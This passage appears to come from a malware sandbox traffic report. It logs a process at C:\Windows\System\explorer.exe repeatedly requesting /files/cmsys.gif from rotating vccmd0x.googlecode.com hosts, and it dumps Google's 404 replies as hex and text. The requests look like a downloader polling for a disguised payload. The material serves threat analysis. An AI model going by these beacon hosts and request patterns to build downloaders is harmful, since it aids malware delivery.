                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:40.348932981 CEST9193INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  22192.168.2.449803142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:42.379738092 CEST9194OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:42.406915903 CEST9196INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:42 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:42.406941891 CEST9196INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  23192.168.2.449804142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:44.438968897 CEST9197OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:44.466250896 CEST9199INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:44 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:44.466272116 CEST9199INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  24192.168.2.449806142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:53.283324957 CEST9204OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:53.313359022 CEST9205INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:53 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 